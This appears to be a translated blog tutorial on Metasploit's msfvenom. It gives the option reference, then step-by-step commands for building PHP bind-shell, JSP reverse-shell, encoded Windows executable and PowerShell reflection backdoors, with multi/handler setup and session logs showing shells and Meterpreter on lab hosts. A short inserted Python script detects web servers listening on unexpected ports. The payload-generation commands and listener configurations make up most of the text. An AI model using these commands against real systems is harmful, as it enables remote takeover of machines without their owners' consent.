
Metasploit Framework msfvenom

The msfvenom command-line options are as follows:

Options:

-p, --payload <payload>    Payload to use. For a custom payload, specify '-' or read it from stdin
-l, --list [module_type]   List all available resources of the given module type: payloads, encoders, nops, all
-n, --nopsled <length>     Prepend a NOP sled of the given length to the payload
-f, --format <format>      Output format (use --help-formats for the list of formats msfvenom supports)
-e, --encoder [encoder]    Encoder to use
-a, --arch <architecture>  Target architecture of the payload
--platform <platform>      Target platform of the payload
-s, --space <length>       Maximum size of the resulting payload
-b, --bad-chars <list>     Characters to avoid, for example: '\x00\xff'
-i, --iterations <count>   Number of times to encode the payload
-c, --add-code <path>      Additional win32 shellcode file to include
-x, --template <path>      Custom executable file to use as a template
-k, --keep                 Preserve the template program's behaviour; the injected payload runs as a new process
--payload-options          List the payload's standard options
-o, --out <path>           Save the payload to a file (shell redirection with '>' works as well)
-v, --var-name <name>      Custom variable name to use in certain output formats
--smallest                 Generate the smallest possible payload
-h, --help                 Show the help

--help-formats lists the output formats msfvenom supports:

root@kali:/usr/share/metasploit-framework/modules/payloads/singles# msfvenom --help-formats
Executable formats
	asp, aspx, aspx-exe, axis2, dll, elf, elf-so, exe, exe-only, exe-service, exe-small, hta-psh, jar, jsp, loop-vbs, macho, msi, msi-nouac, osx-app, psh, psh-cmd, psh-net, psh-reflection, vba, vba-exe, vba-psh, vbs, war
Transform formats
	bash, c, csharp, dw, dword, hex, java, js_be, js_le, num, perl, pl, powershell, ps1, py, python, raw, rb, ruby, sh, vbapplication, vbscript

The -f format argument can be replaced by a single capital letter;
for example, X stands for -f exe:

[H]arp
[P]erl
Rub[Y]
[R]aw
[J]s
e[X]e
[D]ll
[V]BA
[W]ar
Pytho[N]

First, the payloads. There are currently 437 of them, roughly grouped by target platform (windows/linux/osx/android) and by language (python, php, and so on).
root@kali:~# msfvenom -l payloads

List the supported encoders:
root@kali:~# msfvenom -l encoders
If you pass -b (a set of bad characters to avoid), an encoder is selected automatically.
Otherwise you choose an encoder module explicitly with -e, for example:
./msfvenom -p windows/meterpreter/bind_tcp -e x86/shikata_ga_nai -f raw
The -i option applies the encoder several times in a row:
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -b '\x00' LHOST=172.16.100.128 LPORT=2345 -f exe -o abc.exe

Some usage examples follow. Lab setup:
Kali: 172.16.100.182
Test machine: 172.16.100.155

Generating a PHP backdoor with msfvenom

List the PHP-related payloads:

msfvenom -l payloads | grep php

Here we test with bind_php:

php/bind_php Listen for a connection and spawn a command shell via php

View the payload's options:

root@kali:~# msfvenom -p php/bind_php --payload-options

Generate the backdoor:

msfvenom -p php/bind_php RHOST=172.16.100.155 R

Remove the leading /* from the generated code and save it as 1.php on the test machine.
Request http://172.16.100.155/1.php, then check that the listener is up:

[root@vincenthostname html]# netstat -antlp | grep httpd
tcp 0 0 0.0.0.0:4444 0.0.0.0:* LISTEN 1494/httpd
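The netstat check above is the defender's side of this story: a web server process that suddenly LISTENs on 4444 is exactly the footprint php/bind_php leaves in httpd. The following is an added example, not code from the original post or from Metasploit; it parses netstat -antlp output and flags web-server processes listening on ports outside their expected set. The sample output is constructed, and the WEB_SERVERS and EXPECTED_PORTS sets are assumptions to tune per host.

```python
import re

# Constructed sample of `netstat -antlp` output, modelled on the page's
# scenario: httpd (PID 1494) has acquired a listener on 4444 next to its
# normal 80/443 sockets. The sshd and ESTABLISHED lines are normal noise.
SAMPLE_NETSTAT = """\
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      1102/sshd
tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN      1494/httpd
tcp        0      0 :::443                  :::*                    LISTEN      1494/httpd
tcp        0      0 0.0.0.0:4444            0.0.0.0:*               LISTEN      1494/httpd
tcp        0      0 172.16.100.155:80       172.16.100.182:43122    ESTABLISHED 1497/httpd
"""

# Assumptions: which program names are web servers, and which ports they
# are allowed to listen on. Adjust both to the host being checked.
WEB_SERVERS = {"httpd", "apache2", "nginx", "php-fpm"}
EXPECTED_PORTS = {80, 443, 8080, 8443}

# One TCP socket line: proto, recv-q, send-q, local, foreign, state, pid/program.
# Lines whose PID/Program column is "-" (not visible to this user) do not match.
LINE_RE = re.compile(
    r"^(?P<proto>tcp6?)\s+\d+\s+\d+\s+(?P<local>\S+)\s+\S+\s+"
    r"(?P<state>\S+)\s+(?P<pid>\d+)/(?P<prog>\S+)"
)


def parse_netstat(text):
    """Yield (port, state, pid, program) for every parsable TCP line."""
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # header line or a socket without an owning PID
        # Local address may be IPv4 "0.0.0.0:80" or IPv6 ":::443"; the port
        # is always the text after the last colon.
        port = int(m.group("local").rsplit(":", 1)[1])
        yield port, m.group("state"), int(m.group("pid")), m.group("prog")


def unexpected_web_listeners(text, expected=EXPECTED_PORTS):
    """Return [(pid, program, port)] for web servers LISTENing on unexpected ports."""
    return [
        (pid, prog, port)
        for port, state, pid, prog in parse_netstat(text)
        if state == "LISTEN" and prog in WEB_SERVERS and port not in expected
    ]


if __name__ == "__main__":
    for pid, prog, port in unexpected_web_listeners(SAMPLE_NETSTAT):
        print(f"ALERT: {prog} (pid {pid}) is listening on unexpected port {port}")
```

On a live host, feed the real output in with `unexpected_web_listeners(subprocess.check_output(["netstat", "-antlp"], text=True))` from a root shell, since PID/Program is only shown for sockets the caller can see.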


msf > use multi/handler
msf exploit(handler) > set payload php/bind_php
payload => php/bind_php
msf exploit(handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------

Payload options (php/bind_php):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LPORT  4444             yes       The listen port
   RHOST                   no        The target address

Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target

msf exploit(handler) > set rhost 172.16.100.155
rhost => 172.16.100.155
msf exploit(handler) > exploit 
[*] Exploit running as background job.

[*] Started bind handler
msf exploit(handler) > [*] Command shell session 1 opened (172.16.100.182:43351 -> 172.16.100.155:4444) at 2017-09-14 15:57:11 +0800


Upgrading the shell to Meterpreter:

msf exploit(handler) > sessions -u 1
[*] Executing 'post/multi/manage/shell_to_meterpreter' on session(s): [1]

[*] Upgrading session ID: 1
[*] Starting exploit/multi/handler
[*] Started reverse TCP handler on 172.16.100.182:4433 
[*] Sending stage (826840 bytes) to 172.16.100.155
[*] Meterpreter session 2 opened (172.16.100.182:4433 -> 172.16.100.155:43087) at 2017-09-14 15:58:49 +0800
[+] negotiating tlv encryption
[+] negotiated tlv encryption
[+] negotiated tlv encryption
[*] Command stager progress: 100.00% (736/736 bytes)
msf exploit(handler) > sessions -l

Active sessions
===============

Id Type Information Connection
-- ---- ----------- ----------
1 shell php/php 172.16.100.182:43351 -> 172.16.100.155:4444 (172.16.100.155)
2 meterpreter x86/linux uid=48, gid=48, euid=48, egid=48 @ 172.16.100.155 172.16.100.182:4433 -> 172.16.100.155:43087 (172.16.100.155)

msf exploit(handler) > sessions -i 2
[*] Starting interaction with 2...

meterpreter > sysinfo
Computer : 172.16.100.155
OS : CentOS 6.5 (Linux 2.6.39)
Architecture : x64
Meterpreter : x86/linux

Generating a Java backdoor with msfvenom

List the usable payloads:

msfvenom -l payloads | grep java

Here we use:

java/jsp_shell_reverse_tcp Connect back to attacker and spawn a command shell
root@kali:~# msfvenom -p java/jsp_shell_reverse_tcp LHOST=172.16.100.182 > /tmp/shell.jsp
Payload size: 1500 bytes

Once the JSP page is requested, the reverse shell connects back:

msf > use multi/handler
msf exploit(handler) > set payload java/jsp_shell_reverse_tcp
payload => java/jsp_shell_reverse_tcp
msf exploit(handler) > set lhost 172.16.100.182
lhost => 172.16.100.182
msf exploit(handler) > exploit 
[*] Exploit running as background job.

[*] Started reverse TCP handler on 172.16.100.182:4444 
msf exploit(handler) > [*] Command shell session 1 opened (172.16.100.182:4444 -> 172.16.100.1:5509) at 2017-09-14 16:11:10 +0800
msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1...

Microsoft Windows [版本 6.1.7601]
版权所有 (c) 2009 Microsoft Corporation。保留所有权利。

E:\tomcat\bin>whoami
whoami
dell-pc\dell

Generating a Windows backdoor with msfvenom

root@kali-vincent:/tmp# msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -b '\x00' LHOST=172.16.100.128 LPORT=2345 -f exe -o abc.exe

Local listener:

msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 172.16.100.128
LHOST => 172.16.100.128
msf exploit(handler) > set LPORT 2345
LPORT => 2345
msf exploit(handler) > exploit

[*] Started reverse handler on 172.16.100.128:2345 
[*] Starting the payload handler...
[*] Sending stage (885806 bytes) to 172.16.100.1
[*] Meterpreter session 1 opened (172.16.100.128:2345 -> 172.16.100.1:56101) at 2016-03-20 16:08:55 +0800

meterpreter > sysinfo 
Computer : DELL-PC
OS : Windows 7 (Build 7601, Service Pack 1).
Architecture : x64 (Current Process is WOW64)
System Language : zh_CN
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x86/win32

Generating a PowerShell backdoor for Windows

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=172.16.100.182 LPORT=6666 -f psh-reflection > test.ps1
msf > use multi/handler
msf exploit(handler) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 172.16.100.182
lhost => 172.16.100.182
msf exploit(handler) > set lport 6666
lport => 6666
msf exploit(handler) > exploit 
[*] Exploit running as background job.

[*] Started reverse TCP handler on 172.16.100.182:6666

Then, on the Windows machine, run powershell -file "test.ps1":

msf exploit(handler) > 
[*] Sending stage (194623 bytes) to 172.16.100.1
[*] Meterpreter session 6 opened (172.16.100.182:6666 -> 172.16.100.1:62470) at 2017-09-23 17:33:08 +0800
[+] negotiating tlv encryption
[+] negotiated tlv encryption
[+] negotiated tlv encryption

msf exploit(handler) > sessions -i 6
[*] Starting interaction with 6...

meterpreter > getuid
Server username: dell-PC\dell

References
http://www.freebuf.com/sectool/72135.html
http://www.huo119.com/post/909.shtm